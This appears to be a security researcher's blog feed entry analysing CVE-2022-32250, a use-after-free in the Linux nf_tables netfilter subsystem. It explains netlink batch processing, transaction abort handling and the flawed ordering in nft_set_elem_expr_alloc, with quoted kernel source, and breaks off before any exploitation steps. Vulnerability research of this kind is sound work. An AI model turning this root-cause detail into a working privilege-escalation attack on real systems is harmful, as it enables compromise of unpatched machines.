</ul>]]></content><author><name>kyeojy</name></author><category term="security" /><category term="exploitation" /><category term="arm-mali" /><category term="gpu" /><category term="kernel" /><category term="android" /><category term="use-after-free" /><category term="pixel" /><summary type="html"><![CDATA[This post documents a Use-After-Free (UAF) issue in the Arm Mali GPU kernel driver that I discovered sometime in Oct-Nov 2022.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://kyeojy.github.io/assets/og-image.png" /><media:content medium="image" url="https://kyeojy.github.io/assets/og-image.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">A Netfilter hole</title><link href="https://kyeojy.github.io/posts/a-netfilter-hole/" rel="alternate" type="text/html" title="A Netfilter hole" /><published>2026-05-22T09:27:00+00:00</published><updated>2026-05-22T09:27:00+00:00</updated><id>https://kyeojy.github.io/posts/a-netfilter-hole</id><content type="html" xml:base="https://kyeojy.github.io/posts/a-netfilter-hole/"><![CDATA[<p>This post explores the root cause and exploitation of <code class="language-plaintext highlighter-rouge">CVE-2022-32250</code>, a vulnerability I exploited for a successful demonstration at Pwn2Own Vancouver 2022, and also the first vulnerability I discovered. The issue was used to achieve local privilege escalation on <code class="language-plaintext highlighter-rouge">Ubuntu 22.04 kernel 5.15.0-30-release</code>.</p>

<p>It turns out that around the time of the competition, there was a separate disclosure from NCC Group to the kernel maintainer for the same issue, and ultimately they were given credit for <code class="language-plaintext highlighter-rouge">CVE-2022-32250</code> as they were considered the first ones to report it. Some time after, there were multiple write-ups published on exploitation of the vulnerability (e.g. <a href="https://www.nccgroup.com/research/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/">here</a> and <a href="https://theori.io/blog/linux-kernel-exploit-cve-2022-32250-with-mqueue">here</a>), and this post will offer a different method of exploitation, using only objects from netfilter modules.</p>

<h1 id="netlink-batch-processing">Netlink batch processing</h1>
<p>The vulnerability is a use-after-free (UAF) and to better understand the conditions that lead to this UAF, it is helpful to understand how netlink processes batches of messages, as well as how the creation and deletion of objects are handled. When interacting with the <code class="language-plaintext highlighter-rouge">nf_tables</code> API, we can send multiple batches of netlink messages, where each batch consists of a number of netlink messages. When netlink
messages are processed by the kernel, they eventually reach the function <code class="language-plaintext highlighter-rouge">nfnetlink_rcv_batch</code>. The batch of netlink messages is then processed one at a time by this function.
The function first retrieves the <code class="language-plaintext highlighter-rouge">nfnetlink_subsystem</code> responsible for processing the batch and then gets the relevant callback handler to handle each message in the batch. If an entire batch is processed successfully, <code class="language-plaintext highlighter-rouge">ss-&gt;commit(...) [1]</code> is called, which is a function pointer to <code class="language-plaintext highlighter-rouge">nf_tables_commit</code>. If an error is encountered while processing the batch, it adds the <code class="language-plaintext highlighter-rouge">NFNL_BATCH_FAILURE</code> flag to the status and instead of calling <code class="language-plaintext highlighter-rouge">ss-&gt;commit(...)</code>, it calls <code class="language-plaintext highlighter-rouge">ss-&gt;abort(...) [2]</code>, which is a function pointer to <code class="language-plaintext highlighter-rouge">nf_tables_abort</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">nfnetlink_rcv_batch</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="n">nlh</span><span class="p">,</span>
                                <span class="n">u16</span> <span class="n">subsys_id</span><span class="p">,</span> <span class="n">u32</span> <span class="n">genid</span><span class="p">)</span>
<span class="p">{</span>
    <span class="p">...</span>
    <span class="n">ss</span> <span class="o">=</span> <span class="n">nfnl_dereference_protected</span><span class="p">(</span><span class="n">subsys_id</span><span class="p">);</span>
    <span class="p">...</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">&gt;=</span> <span class="n">nlmsg_total_size</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> <span class="p">{</span>
            <span class="kt">int</span> <span class="n">msglen</span><span class="p">,</span> <span class="n">type</span><span class="p">;</span>
        <span class="p">...</span>
        <span class="n">nc</span> <span class="o">=</span> <span class="n">nfnetlink_find_client</span><span class="p">(</span><span class="n">type</span><span class="p">,</span> <span class="n">ss</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nc</span><span class="p">)</span> <span class="p">{</span>
                        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
                        <span class="k">goto</span> <span class="n">ack</span><span class="p">;</span>
                <span class="p">}</span>
        <span class="p">...</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">nc</span><span class="o">-&gt;</span><span class="n">call</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">info</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">**</span><span class="p">)</span><span class="n">cda</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nlh</span><span class="o">-&gt;</span><span class="n">nlmsg_flags</span> <span class="o">&amp;</span> <span class="n">NLM_F_ACK</span> <span class="o">||</span> <span class="n">err</span><span class="p">)</span> <span class="p">{</span>
                <span class="cm">/* Errors are delivered once the full batch has been
                    * processed, this avoids that the same error is
                    * reported several times when replaying the batch.
                    */</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">nfnl_err_add</span><span class="p">(</span><span class="o">&amp;</span><span class="n">err_list</span><span class="p">,</span> <span class="n">nlh</span><span class="p">,</span> <span class="n">err</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">extack</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
                        <span class="cm">/* We failed to enqueue an error, reset the
                            * list of errors and send OOM to userspace
                            * pointing to the batch header.
                            */</span>
                        <span class="n">nfnl_err_reset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">err_list</span><span class="p">);</span>
                        <span class="n">netlink_ack</span><span class="p">(</span><span class="n">oskb</span><span class="p">,</span> <span class="n">nlmsg_hdr</span><span class="p">(</span><span class="n">oskb</span><span class="p">),</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">,</span>
                                    <span class="nb">NULL</span><span class="p">);</span>
                        <span class="n">status</span> <span class="o">|=</span> <span class="n">NFNL_BATCH_FAILURE</span><span class="p">;</span>
                        <span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
                <span class="p">}</span>
                <span class="cm">/* We don't stop processing the batch on errors, thus,
                    * userspace gets all the errors that the batch
                    * triggers.
                    */</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span>
                        <span class="n">status</span> <span class="o">|=</span> <span class="n">NFNL_BATCH_FAILURE</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
    <span class="p">}</span>
<span class="nl">done:</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">status</span> <span class="o">&amp;</span> <span class="n">NFNL_BATCH_REPLAY</span><span class="p">)</span> <span class="p">{</span>
            <span class="p">...</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">status</span> <span class="o">==</span> <span class="n">NFNL_BATCH_DONE</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">err</span> <span class="o">=</span> <span class="n">ss</span><span class="o">-&gt;</span><span class="n">commit</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">oskb</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="o">-</span><span class="n">EAGAIN</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">status</span> <span class="o">|=</span> <span class="n">NFNL_BATCH_REPLAY</span><span class="p">;</span>
                    <span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
            <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">ss</span><span class="o">-&gt;</span><span class="n">abort</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">oskb</span><span class="p">,</span> <span class="n">NFNL_ABORT_NONE</span><span class="p">);</span>
                    <span class="n">netlink_ack</span><span class="p">(</span><span class="n">oskb</span><span class="p">,</span> <span class="n">nlmsg_hdr</span><span class="p">(</span><span class="n">oskb</span><span class="p">),</span> <span class="n">err</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
            <span class="p">}</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="k">enum</span> <span class="n">nfnl_abort_action</span> <span class="n">abort_action</span><span class="p">;</span>

            <span class="k">if</span> <span class="p">(</span><span class="n">status</span> <span class="o">&amp;</span> <span class="n">NFNL_BATCH_FAILURE</span><span class="p">)</span>
                    <span class="n">abort_action</span> <span class="o">=</span> <span class="n">NFNL_ABORT_NONE</span><span class="p">;</span>
            <span class="k">else</span>
                    <span class="n">abort_action</span> <span class="o">=</span> <span class="n">NFNL_ABORT_VALIDATE</span><span class="p">;</span>

            <span class="n">err</span> <span class="o">=</span> <span class="n">ss</span><span class="o">-&gt;</span><span class="n">abort</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">oskb</span><span class="p">,</span> <span class="n">abort_action</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
            <span class="p">...</span>
    <span class="p">}</span>
    <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The callback handlers that actually process each message of the batch are different <code class="language-plaintext highlighter-rouge">nf_tables</code> functions and some examples of them are the following.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_callback</span> <span class="n">nf_tables_cb</span><span class="p">[</span><span class="n">NFT_MSG_MAX</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
        <span class="p">...</span>
        <span class="p">[</span><span class="n">NFT_MSG_NEWSETELEM</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_newsetelem</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_BATCH</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_SET_ELEM_LIST_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_set_elem_list_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">[</span><span class="n">NFT_MSG_GETSETELEM</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_getsetelem</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_RCU</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_SET_ELEM_LIST_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_set_elem_list_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">[</span><span class="n">NFT_MSG_DELSETELEM</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_delsetelem</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_BATCH</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_SET_ELEM_LIST_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_set_elem_list_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">[</span><span class="n">NFT_MSG_NEWOBJ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_newobj</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_BATCH</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_OBJ_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_obj_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">[</span><span class="n">NFT_MSG_GETOBJ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_getobj</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_RCU</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_OBJ_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_obj_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">[</span><span class="n">NFT_MSG_DELOBJ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">call</span>           <span class="o">=</span> <span class="n">nf_tables_delobj</span><span class="p">,</span>
                <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="n">NFNL_CB_BATCH</span><span class="p">,</span>
                <span class="p">.</span><span class="n">attr_count</span>     <span class="o">=</span> <span class="n">NFTA_OBJ_MAX</span><span class="p">,</span>
                <span class="p">.</span><span class="n">policy</span>                 <span class="o">=</span> <span class="n">nft_obj_policy</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="p">...</span>
<span class="p">};</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">nf_tables_commit</code> and <code class="language-plaintext highlighter-rouge">nf_tables_abort</code> both iterate through the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> and handle each item in the list. <code class="language-plaintext highlighter-rouge">nf_tables_abort</code> is more relevant for our context so we’ll focus on that. Items in the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> are basically transaction objects, which encapsulate the type of update that needs to be done for an <code class="language-plaintext highlighter-rouge">nf_tables</code> object and a data structure containing the target object. When <code class="language-plaintext highlighter-rouge">nf_tables</code> objects are being created or destroyed, they are wrapped in a <code class="language-plaintext highlighter-rouge">struct nft_trans</code> object and added to the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code>, eventually being processed together with other <code class="language-plaintext highlighter-rouge">nft_trans</code> instances at the end of processing a batch. Each <code class="language-plaintext highlighter-rouge">nft_trans</code> is removed from the list after it is processed.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">__nf_tables_abort</span><span class="p">(</span><span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span><span class="p">,</span> <span class="k">enum</span> <span class="n">nfnl_abort_action</span> <span class="n">action</span><span class="p">)</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">list_for_each_entry_safe_reverse</span><span class="p">(</span><span class="n">trans</span><span class="p">,</span> <span class="n">next</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">,</span>
                                         <span class="n">list</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">switch</span> <span class="p">(</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">msg_type</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWSETELEM</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_elem_set_bound</span><span class="p">(</span><span class="n">trans</span><span class="p">))</span> <span class="p">{</span>
                                <span class="n">nft_trans_destroy</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
                                <span class="k">break</span><span class="p">;</span>
                        <span class="p">}</span>
                        <span class="n">te</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans_elem</span> <span class="o">*</span><span class="p">)</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">;</span>
                        <span class="n">nft_setelem_remove</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">elem</span><span class="p">);</span>
                        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nft_setelem_is_catchall</span><span class="p">(</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">elem</span><span class="p">))</span>
                                <span class="n">atomic_dec</span><span class="p">(</span><span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">nelems</span><span class="p">);</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="p">...</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWOBJ</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_obj_update</span><span class="p">(</span><span class="n">trans</span><span class="p">))</span> <span class="p">{</span>
                                <span class="n">nft_obj_destroy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">,</span>
                                                <span class="n">nft_trans_obj_newobj</span><span class="p">(</span><span class="n">trans</span><span class="p">));</span>
                                <span class="n">nft_trans_destroy</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
                        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                                <span class="n">trans</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">.</span><span class="n">table</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">--</span><span class="p">;</span>
                                <span class="n">nft_obj_del</span><span class="p">(</span><span class="n">nft_trans_obj</span><span class="p">(</span><span class="n">trans</span><span class="p">));</span>
                        <span class="p">}</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="p">...</span>
                <span class="p">}</span>
        <span class="p">}</span>
        <span class="n">list_for_each_entry_safe_reverse</span><span class="p">(</span><span class="n">trans</span><span class="p">,</span> <span class="n">next</span><span class="p">,</span>
                                         <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">,</span> <span class="n">list</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">);</span>
                <span class="n">nf_tables_abort_release</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
        <span class="p">}</span>
         <span class="p">...</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>For instance, when an <code class="language-plaintext highlighter-rouge">nft_object</code> is created, the creation is handled by the function <code class="language-plaintext highlighter-rouge">nf_tables_newobj</code>. After the necessary initialization of the object, the object is added to an <code class="language-plaintext highlighter-rouge">nft_trans</code> [1] and this <code class="language-plaintext highlighter-rouge">nft_trans</code> is added to an <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> [2]. At the same time, the object is added to an <code class="language-plaintext highlighter-rouge">rhltable</code> for future lookups. During triggering of the vulnerability, <code class="language-plaintext highlighter-rouge">__nf_tables_abort</code> will be called, which accesses the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_newobj</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
                            <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="n">table</span> <span class="o">=</span> <span class="n">nft_table_lookup</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_OBJ_TABLE</span><span class="p">],</span> <span class="n">family</span><span class="p">,</span> <span class="n">genmask</span><span class="p">,</span>
                                 <span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">portid</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">obj</span> <span class="o">=</span> <span class="n">nft_obj_init</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">type</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_OBJ_DATA</span><span class="p">]);</span>
        <span class="p">...</span>
        <span class="n">obj</span><span class="o">-&gt;</span><span class="n">key</span><span class="p">.</span><span class="n">table</span> <span class="o">=</span> <span class="n">table</span><span class="p">;</span>
        <span class="n">obj</span><span class="o">-&gt;</span><span class="n">handle</span> <span class="o">=</span> <span class="n">nf_tables_alloc_handle</span><span class="p">(</span><span class="n">table</span><span class="p">);</span>

        <span class="n">obj</span><span class="o">-&gt;</span><span class="n">key</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">nla_strdup</span><span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_OBJ_NAME</span><span class="p">],</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">key</span><span class="p">.</span><span class="n">name</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
                <span class="k">goto</span> <span class="n">err_strdup</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">nft_trans_obj_add</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">NFT_MSG_NEWOBJ</span><span class="p">,</span> <span class="n">obj</span><span class="p">);</span>    <span class="o">&lt;---</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                <span class="k">goto</span> <span class="n">err_trans</span><span class="p">;</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">rhltable_insert</span><span class="p">(</span><span class="o">&amp;</span><span class="n">nft_objname_ht</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">rhlhead</span><span class="p">,</span>
                              <span class="n">nft_objname_ht_params</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">list_add_tail_rcu</span><span class="p">(</span><span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">table</span><span class="o">-&gt;</span><span class="n">objects</span><span class="p">);</span>
        <span class="n">table</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_trans_obj_add</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="kt">int</span> <span class="n">msg_type</span><span class="p">,</span>
                             <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">;</span>

        <span class="n">trans</span> <span class="o">=</span> <span class="n">nft_trans_alloc</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">msg_type</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans_obj</span><span class="p">));</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">trans</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
                <span class="k">return</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">msg_type</span> <span class="o">==</span> <span class="n">NFT_MSG_NEWOBJ</span><span class="p">)</span>
                <span class="n">nft_activate_next</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">obj</span><span class="p">);</span>

        <span class="n">nft_trans_obj</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="n">obj</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="n">nft_trans_commit_list_add_tail</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">trans</span><span class="p">);</span>

        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_trans_commit_list_add_tail</span><span class="p">(</span><span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nftables_pernet</span> <span class="o">*</span><span class="n">nft_net</span> <span class="o">=</span> <span class="n">nft_pernet</span><span class="p">(</span><span class="n">net</span><span class="p">);</span>

        <span class="n">list_add_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<h1 id="the-vulnerability">The vulnerability</h1>
<p>The actual bug is due to the ordering of [1] and [2] in <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code>. <code class="language-plaintext highlighter-rouge">nft_expr_init</code> is called regardless of the type of <code class="language-plaintext highlighter-rouge">nf_tables</code> expression and the check <code class="language-plaintext highlighter-rouge">if (!(expr-&gt;ops-&gt;type-&gt;flags &amp; NFT_EXPR_STATEFUL))</code> is only performed subsequently. When the check at [2] fails, it goes to the error handling code and returns an error.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_set_elem_expr_alloc</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
					 <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
					 <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

	<span class="n">expr</span> <span class="o">=</span> <span class="n">nft_expr_init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">expr</span><span class="p">))</span>
		<span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EOPNOTSUPP</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_STATEFUL</span><span class="p">))</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
		<span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_GC</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_TIMEOUT</span><span class="p">)</span>
			<span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
